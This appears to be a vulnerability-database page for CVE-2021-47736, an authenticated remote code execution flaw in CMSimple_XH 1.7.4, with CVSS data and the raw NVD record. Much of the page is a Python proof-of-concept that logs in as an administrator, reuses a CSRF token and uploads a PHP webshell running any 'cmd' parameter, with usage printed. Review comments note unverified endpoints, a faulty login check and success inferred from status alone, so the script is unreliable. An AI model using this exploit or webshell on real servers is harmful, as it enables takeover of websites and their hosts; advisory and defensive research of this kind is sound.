Security Vulnerability Report
CVE-2021-47736 CVSS 7.2 HIGH

CVE-2021-47736

Published: 2025-12-23 20:15:45
Last Modified: 2026-01-05 14:15:52

Description

CMSimple_XH 1.7.4 contains an authenticated remote code execution vulnerability in the content editing functionality that allows administrative users to upload malicious PHP files. Attackers with valid credentials can exploit the CSRF token mechanism to create a PHP shell file that enables arbitrary command execution on the server.

CVSS Details

CVSS Score
7.2 (CVSS 3.1 base score; the raw record below also carries a secondary CVSS 4.0 score of 8.6)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:cmsimple-xh:cmsimple_xh:1.7.4:-:*:*:*:*:*:* - VULNERABLE
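CMSimple_XH < 1.7.4 (note: this range excludes 1.7.4, whereas the CPE entry above and the description both name version 1.7.4 itself as vulnerable)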

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import re
import argparse

# CVE-2021-47736 PoC - CMSimple_XH Authenticated RCE
# Target: CMSimple_XH <= 1.7.4
# Vulnerability: Authenticated RCE via content editing functionality
#
# NOTE(review): the endpoints and form field names below are reproduced as
# printed on this page; they have not been checked against the Exploit-DB
# entry that the CVE record references, so treat them as unverified.
# NOTE(review): "<= 1.7.4" here differs from the record's CPE, which lists
# exactly 1.7.4 as vulnerable.
#
# Defender's reading of the flow:
#   * Precondition: valid administrator credentials (the record scores PR:H),
#     so restricting and monitoring access to the admin login is the first
#     line of mitigation.
#   * Requests issued, in order: POST to "/?CMSimple_XH=1&admin=login",
#     GET then POST to "/?CMSimple_XH=1&admin=plugin_container", the POST
#     carrying a "heading" value ending in ".php" and PHP source in "text".
#   * Follow-up the script advertises: requests to the new ".php" path with
#     a "cmd" query parameter. New PHP files under the web root and requests
#     of that shape are the artefacts to alert on.

def get_csrf_token(session, target_url):
    """Fetch the plugin_container admin page and return its `_csrf` field value.

    Uses the already-authenticated `session`. Returns the token string, or
    None when the hidden field is not found in the response body or when the
    request raises (the error is printed, not re-raised).
    """
    try:
        response = session.get(target_url + '/?CMSimple_XH=1&admin=plugin_container')
        # The token is taken from the form as served; nothing here bypasses
        # the CSRF check, it simply reuses a token issued to the session.
        match = re.search(r'name="_csrf" value="([^"]+)"', response.text)
        if match:
            return match.group(1)
        return None
    except Exception as e:
        print(f"[-] Error fetching CSRF token: {e}")
        return None

def exploit_cmsimple_rce(target_url, username, password, lhost, lport):
    """Log in as an administrator and submit PHP source through the content editor.

    Returns True when the final POST answers HTTP 200 and False on any
    earlier failure. `lhost` and `lport` are accepted but never read in this
    function; `main` passes None for both.
    """
    session = requests.Session()
    # Step 1: Login as admin
    login_url = target_url + '/?CMSimple_XH=1&admin=login'
    login_data = {
        'username': username,
        'password': password,
        'login': 'Login'
    }
    print("[*] Attempting to login...")
    response = session.post(login_url, data=login_data)
    # NOTE(review): failure is reported only when the 'logged_in' marker is
    # absent AND the status is not 200, so any HTTP 200 page prints
    # "Login successful!". The message is not evidence that the credentials
    # were accepted.
    if 'logged_in' not in response.text and response.status_code != 200:
        print("[-] Login failed!")
        return False
    print("[+] Login successful!")
    # Step 2: Get CSRF token
    csrf_token = get_csrf_token(session, target_url)
    if not csrf_token:
        print("[-] Could not obtain CSRF token")
        return False
    print(f"[+] CSRF Token obtained: {csrf_token}")
    # Step 3: Upload malicious PHP shell via content editing
    upload_url = target_url + '/?CMSimple_XH=1&admin=plugin_container'
    # PHP webshell payload. The f-prefix interpolates nothing: the doubled
    # braces are f-string escapes that yield literal "{" and "}".
    php_shell = f"<?php if(isset($_REQUEST['cmd'])){{ $cmd=$_REQUEST['cmd']; system($cmd); }} ?>"
    upload_data = {
        '_csrf': csrf_token,
        'action': 'save',
        'text': php_shell,
        'heading': 'test.php'
    }
    print("[*] Uploading malicious PHP file...")
    response = session.post(upload_url, data=upload_data)
    # NOTE(review): success is inferred from the HTTP status alone; the
    # script never checks that a file was written or is served, so its
    # output should not be read as confirmation that a host is vulnerable
    # or compromised.
    if response.status_code == 200:
        print("[+] PHP webshell uploaded successfully!")
        print(f"[*] Shell location: {target_url}/test.php")
        print(f"[*] Usage: {target_url}/test.php?cmd=<command>")
        return True
    else:
        print("[-] Failed to upload webshell")
        return False

def main():
    """Parse the target URL and admin credentials from the command line and run the PoC."""
    parser = argparse.ArgumentParser(description='CVE-2021-47736 Exploit')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-u', '--username', required=True, help='Admin username')
    parser.add_argument('-p', '--password', required=True, help='Admin password')
    args = parser.parse_args()
    # lhost/lport have no command-line options; None is passed for both.
    exploit_cmsimple_rce(args.target, args.username, args.password, None, None)

if __name__ == '__main__':
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47736", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:45.430", "lastModified": "2026-01-05T14:15:51.647", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "CMSimple_XH 1.7.4 contains an authenticated remote code execution vulnerability in the content editing functionality that allows administrative users to upload malicious PHP files. Attackers with valid credentials can exploit the CSRF token mechanism to create a PHP shell file that enables arbitrary command execution on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cmsimple-xh:cmsimple_xh:1.7.4:-:*:*:*:*:*:*", "matchCriteriaId": "935FD8AD-BBA8-45CC-9FE5-064466F62F97"}]}]}], "references": [{"url": "https://www.cmsimple-xh.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50367", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/cmsimplexh-authenticated-remote-code-execution-via-content-editing", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}